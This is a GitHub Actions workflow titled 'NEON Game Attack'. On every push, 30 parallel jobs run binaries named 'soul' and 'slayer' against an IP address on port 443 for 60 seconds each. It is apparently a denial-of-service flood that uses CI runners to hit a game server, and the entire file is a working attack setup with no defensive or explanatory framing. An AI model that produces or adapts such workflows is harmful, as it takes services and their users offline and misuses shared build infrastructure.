name: NEON Game Attack
on: [push]

jobs:
  soul_attack:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,
            11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - name: Make soul executable and run attack
      run: |
        chmod +x soul
        ./soul 1.1.3.2. 443 60

  slayer_attack:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,
            11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - name: Make slayer executable and run attack
      run: |
        chmod +x slayer
        ./slayer 1.1.3.2. 443 60

